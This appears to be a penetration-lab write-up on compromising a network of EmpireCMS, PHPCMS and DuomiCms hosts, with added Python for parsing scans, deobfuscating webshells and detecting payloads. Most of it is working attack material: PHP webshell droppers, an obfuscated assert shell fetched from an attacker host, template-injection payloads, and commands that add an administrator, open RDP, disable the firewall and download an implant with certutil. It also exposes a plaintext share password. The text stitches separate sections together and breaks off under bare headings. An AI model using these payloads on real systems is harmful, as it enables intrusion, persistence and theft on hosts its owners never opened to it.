EmpireCMS #
Port 80 turns out to be EmpireCMS, version 7.5.
<?php file_put_contents("test.php","<?php @eval(\$_POST['hack']); ?>"); ?>
The dropped file can then be connected to with AntSword (蚁剑).
PHPCMS #
Scan 172.20.55.32/24:
[root@localhost /]# ./fscan1.8 -h 172.20.55.32/24
___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 1.8.4
start infoscan
(icmp) Target 172.20.55.32 is alive
(icmp) Target 172.20.55.33 is alive
(icmp) Target 172.20.55.34 is alive
(icmp) Target 172.20.55.233 is alive
[*] Icmp alive hosts len is: 4
172.20.55.34:3306 open
172.20.55.33:3306 open
172.20.55.34:445 open
172.20.55.33:445 open
172.20.55.34:139 open
172.20.55.33:139 open
172.20.55.34:135 open
172.20.55.33:135 open
172.20.55.34:80 open
172.20.55.32:80 open
172.20.55.233:22 open
172.20.55.32:22 open
172.20.55.233:8080 open
[*] alive ports len is: 13
start vulscan
[*] WebTitle http://172.20.55.32 code:200 len:11160 title:帝国网站管理系统 - Powered by EmpireCMS
[*] NetInfo
[*]172.20.55.33
[->]WIN-AIHNDH3AS2F
[->]172.20.55.33
[*] NetInfo
[*]172.20.55.34
[->]WIN-1H68P9MF87N
[->]172.20.55.34
[->]10.10.10.12
[*] NetBios 172.20.55.34 WORKGROUP\WIN-1H68P9MF87N Windows Server 2016 Datacenter 14393
[*] NetBios 172.20.55.33 WORKGROUP\WIN-AIHNDH3AS2F Windows Server 2016 Datacenter 14393
[+] InfoScan http://172.20.55.32 [CMS]
[*] WebTitle https://172.20.55.233:8080 code:404 len:19 title:None
[*] WebTitle http://172.20.55.34 code:200 len:9657 title:PHPCMS演示站
[+] InfoScan http://172.20.55.34 [CMS]
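The fscan output above is easiest to triage once it is parsed into a per-host view. The following is an added example (not part of the original write-up and not fscan's own code) that parses the 1.8.4 output format into alive hosts, open ports, web titles and NetBIOS names, then lists which hosts expose administrative or database services; the sample input is the scan output quoted above minus the banner, and the list of watched ports is an assumption of the example.

```python
import re
from collections import defaultdict

# Constructed sample: the fscan 1.8.4 output lines quoted above, without the banner.
FSCAN_OUTPUT = """\
start infoscan
(icmp) Target 172.20.55.32 is alive
(icmp) Target 172.20.55.33 is alive
(icmp) Target 172.20.55.34 is alive
(icmp) Target 172.20.55.233 is alive
[*] Icmp alive hosts len is: 4
172.20.55.34:3306 open
172.20.55.33:3306 open
172.20.55.34:445 open
172.20.55.33:445 open
172.20.55.34:139 open
172.20.55.33:139 open
172.20.55.34:135 open
172.20.55.33:135 open
172.20.55.34:80 open
172.20.55.32:80 open
172.20.55.233:22 open
172.20.55.32:22 open
172.20.55.233:8080 open
[*] alive ports len is: 13
start vulscan
[*] WebTitle http://172.20.55.32 code:200 len:11160 title:帝国网站管理系统 - Powered by EmpireCMS
[*] NetBios 172.20.55.34 WORKGROUP\\WIN-1H68P9MF87N Windows Server 2016 Datacenter 14393
[*] NetBios 172.20.55.33 WORKGROUP\\WIN-AIHNDH3AS2F Windows Server 2016 Datacenter 14393
[+] InfoScan http://172.20.55.32 [CMS]
[*] WebTitle https://172.20.55.233:8080 code:404 len:19 title:None
[*] WebTitle http://172.20.55.34 code:200 len:9657 title:PHPCMS演示站
[+] InfoScan http://172.20.55.34 [CMS]
"""

# Line shapes emitted by fscan's infoscan/vulscan phases.
ALIVE = re.compile(r"\(icmp\) Target (\S+) is alive")
PORT = re.compile(r"^(\d{1,3}(?:\.\d{1,3}){3}):(\d+) open$")
WEB = re.compile(r"WebTitle (\S+) code:(\d+) len:(\d+) title:(.*)$")
NETBIOS = re.compile(r"NetBios (\S+) ([^\\\s]+)\\(\S+) (.*)$")

# Services a defender wants to know are reachable from the scanning host (assumed list).
WATCHED_PORTS = {135: "msrpc", 139: "netbios-ssn", 445: "smb", 3306: "mysql"}


def parse_fscan(text):
    """Turn raw fscan output into {alive, ports, web, netbios}."""
    result = {"alive": [], "ports": defaultdict(set), "web": {}, "netbios": {}}
    for line in text.splitlines():
        line = line.strip()
        if m := ALIVE.search(line):
            result["alive"].append(m.group(1))
        elif m := PORT.match(line):
            result["ports"][m.group(1)].add(int(m.group(2)))
        elif m := WEB.search(line):
            url, code, length, title = m.groups()
            result["web"][url] = {"code": int(code), "len": int(length), "title": title}
        elif m := NETBIOS.search(line):
            ip, workgroup, host, os_name = m.groups()
            result["netbios"][ip] = {"workgroup": workgroup, "host": host, "os": os_name}
    result["ports"] = dict(result["ports"])
    return result


def exposure_report(parsed):
    """Map each host to the watched services it exposes, sorted by service name."""
    report = {}
    for ip, ports in parsed["ports"].items():
        hits = sorted(WATCHED_PORTS[p] for p in ports if p in WATCHED_PORTS)
        if hits:
            report[ip] = hits
    return report


if __name__ == "__main__":
    parsed = parse_fscan(FSCAN_OUTPUT)
    for ip, services in exposure_report(parsed).items():
        name = parsed["netbios"].get(ip, {}).get("host", "?")
        print(f"{ip} ({name}): {', '.join(services)}")
```

In this output the two Windows Server 2016 hosts expose SMB, MSRPC and MySQL to the scanning host, which is the kind of lateral-movement surface the later steps of the write-up go on to use.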
172.20.55.34 turns out to be PHPCMS, version 9.6.0.
POST /index.php?m=member&c=index&a=register&siteid=1 HTTP/1.1
Host: 172.20.55.34
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:141.0) Gecko/20100101 Firefox/141.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 158
Origin: http://172.20.55.34
Connection: keep-alive
Referer: http://172.20.55.34/index.php?m=member&c=index&a=register&siteid=1
Cookie: PHPSESSID=0j3i6srambjce3bd66nneltjj2
Upgrade-Insecure-Requests: 1
Priority: u=0, i
siteid=1&modelid=11&username=joe&password=123456&email=123qwe@qq.com&info[content]=<img src=http://172.16.233.2:7777/shell.txt?.php#.jpg>&dosubmit=1&protocol=
The contents of shell.txt are as follows:
<?php class GLd4g34m{/*Fq3c66*/function __construct($x){$c=str_rot13('ffreg');/*Fq3c66*/$a= ("!"^"@").$c;/*Fq3c66*/$a($x);}}new GLd4g34m($_REQUEST['cmd']); ?>
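The shell above hides its callable behind two cheap transforms: `("!"^"@")` is a one-byte string XOR (0x21 ^ 0x40 = 0x61, `"a"`) and `str_rot13('ffreg')` is `ssert`, so `$a` resolves to `assert`, which evaluates a string argument as PHP code on the PHP versions this class of shell targets. The following is an added example (not from the original write-up) of how an analyst can resolve such names statically: it strips comments, evaluates assignments built from `str_rot13()`, string XOR, literals and variable references, and flags files where a dynamically named call resolves to a code-execution function while the file reads request input. The list of dangerous function names is the example's own assumption.

```python
import codecs
import re

# The shell.txt content quoted above, used as sample input.
SAMPLE_SHELL = (
    "<?php class GLd4g34m{/*Fq3c66*/function __construct($x){$c=str_rot13('ffreg');"
    "/*Fq3c66*/$a= (\"!\"^\"@\").$c;/*Fq3c66*/$a($x);}}new GLd4g34m($_REQUEST['cmd']); ?>"
)
# Constructed benign file for comparison.
BENIGN = "<?php $greeting = 'hello'; echo $greeting; ?>"

# Functions that execute their argument as code or as a shell command (assumed list).
DANGEROUS = {"assert", "eval", "system", "exec", "shell_exec", "passthru",
             "popen", "proc_open", "create_function"}
SUPERGLOBAL = re.compile(r"\$_(?:REQUEST|POST|GET|COOKIE)\b")

# Expression pieces the resolver understands, in order of precedence.
TOKEN = re.compile(r"""
      str_rot13\(\s*'([^']*)'\s*\)             # str_rot13('...')        -> group 1
    | \(\s*"([^"]*)"\s*\^\s*"([^"]*)"\s*\)      # ("x" ^ "y") string XOR  -> groups 2, 3
    | '([^']*)'                                 # plain single-quoted literal -> group 4
    | \$(\w+)                                   # variable reference      -> group 5
""", re.VERBOSE)
ASSIGNMENT = re.compile(r"\$(\w+)\s*=\s*([^;]+);")
DYNAMIC_CALL = re.compile(r"\$(\w+)\s*\(")


def strip_comments(src):
    """Remove /* ... */ blocks, which this shell uses purely as noise."""
    return re.sub(r"/\*.*?\*/", "", src, flags=re.S)


def evaluate(expr, env):
    """Concatenate the string value of each recognised piece; '.' needs no handling."""
    out = []
    for rot, xa, xb, lit, var in TOKEN.findall(expr):
        if rot:
            out.append(codecs.decode(rot, "rot13"))
        elif xa or xb:
            out.append("".join(chr(ord(p) ^ ord(q)) for p, q in zip(xa, xb)))
        elif lit:
            out.append(lit)
        elif var:
            out.append(env.get(var, "$" + var))  # unknown variables stay symbolic
    return "".join(out)


def resolve_assignments(src):
    """Evaluate $var = ...; statements in order, so later ones can use earlier ones."""
    env = {}
    for var, expr in ASSIGNMENT.findall(strip_comments(src)):
        env[var] = evaluate(expr, env)
    return env


def dynamic_calls(src):
    """Variables used in function position, e.g. $a(...)."""
    return DYNAMIC_CALL.findall(strip_comments(src))


def analyze(src):
    env = resolve_assignments(src)
    resolved = [(var, env.get(var)) for var in dynamic_calls(src)]
    dangerous = [fn for _, fn in resolved if fn in DANGEROUS]
    return {
        "env": env,
        "dynamic_calls": resolved,
        "dangerous": dangerous,
        "suspicious": bool(dangerous) and bool(SUPERGLOBAL.search(src)),
    }


if __name__ == "__main__":
    print(analyze(SAMPLE_SHELL))
```

Resolving to a concrete name matters for detection rules: a signature on the literal string `assert(` misses this file entirely, whereas a rule on "dynamically named call that resolves to a code-execution function, fed from a superglobal" catches it and its trivially re-obfuscated variants.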
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
net user hack Admin@123 /add
net localgroup Administrators hack /add
netsh firewall set opmode disable
Run the following command on the target Windows host to allow non-TLS, non-NLA RDP connections:
powershell -Command "Set-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp' -Name SecurityLayer -Value 0; Set-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp' -Name UserAuthentication -Value 0"
Connect over Remote Desktop; turn off Defender first.
Mysql #
The configuration file on the first host contains the database configuration for 172.20.55.33.
certutil -urlcache -f -split http://172.16.233.2:7777/evasion.exe evasion.exe
The implant calls back successfully.
DuomiCms #
Scan the internal network behind the PHPCMS host:
http://10.10.10.13/search.php?searchword={if:phpinfo()}phpinfo(){end
http://10.10.10.13/search.php
searchtype=5&order=}{end if} {if:1)phpinfo();if(1}{end if}
searchtype=5&searchword=d&order=}{end if}{if:1)print_r($_POST[func]($_POST[cmd]));//}{end if}&func=assert&cmd=fwrite(fopen("test.php","w"),'<?php eval($_POST["pass"]);?>')
Connection successful.
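Both the PHPCMS registration request earlier (a remote `<img src=...>` whose URL carries a `.php` extension behind `?` and `#`) and the DuomiCms search requests above (template tags `{if:...}` / `{end if}` inside query parameters) leave recognisable marks in web server logs. The following is an added example (not from the original write-up) of request-inspection logic that decodes each parameter and applies one rule per pattern; the sample requests reuse the bodies shown above plus a constructed benign search, and the rule names are the example's own.

```python
import re
from urllib.parse import parse_qsl, unquote_plus

# Constructed sample requests: (method, path, body). The first two reuse the payloads shown above.
SAMPLE_REQUESTS = [
    ("POST", "/index.php?m=member&c=index&a=register&siteid=1",
     "siteid=1&modelid=11&username=joe&password=123456&email=123qwe@qq.com"
     "&info[content]=<img src=http://172.16.233.2:7777/shell.txt?.php#.jpg>&dosubmit=1&protocol="),
    ("POST", "/search.php", "searchtype=5&order=}{end if} {if:1)phpinfo();if(1}{end if}"),
    ("GET", "/search.php?searchword=hello&searchtype=5", ""),
]

# One rule per technique; each is matched against the decoded value of every parameter.
RULES = [
    # DuomiCms template engine tags appearing in user-supplied parameters.
    ("duomicms_template_injection", re.compile(r"\{if:|\{end\s*if\}")),
    # PHPCMS: remote image URL whose path is made to end in .php via '?' or '#' tricks.
    ("phpcms_remote_img_php",
     re.compile(r"<img[^>]+src=\s*[\"']?https?://[^\s>]*\.php[#?]", re.I)),
]


def split_params(path, body):
    """Collect (name, value) pairs from the query string and the form body."""
    query = path.partition("?")[2]
    pairs = []
    for raw in (query, body):
        if raw:
            pairs.extend(parse_qsl(raw, keep_blank_values=True))
    return pairs


def inspect_request(method, path, body):
    """Return [(rule_name, parameter_name)] for every rule a parameter value triggers."""
    findings = []
    for name, value in split_params(path, body):
        text = unquote_plus(value)  # second decode pass catches double-encoded payloads
        for rule_name, pattern in RULES:
            if pattern.search(text):
                findings.append((rule_name, name))
    return findings


def scan_all(requests):
    """Index of request -> findings, omitting clean requests."""
    return {i: f for i, req in enumerate(requests) if (f := inspect_request(*req))}


if __name__ == "__main__":
    for i, findings in scan_all(SAMPLE_REQUESTS).items():
        print(SAMPLE_REQUESTS[i][0], SAMPLE_REQUESTS[i][1], "->", findings)
```

Inspecting decoded parameter values rather than the raw line is what makes the rules hold up against URL encoding, and keying the finding on the parameter name (`info[content]`, `order`) tells the responder where in the application the input reached.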
Mysql #
Found the database file for 10.10.10.14.
IPC #
Check the scheduled tasks on 10.10.10.13.
The IPC$ administrative share on 10.10.10.15, password cyberstrike@2024add.com, is typically used for remote management or privilege abuse. smbexec can be used to interact with the host over IPC; note
Zerologon #
mimikatz detection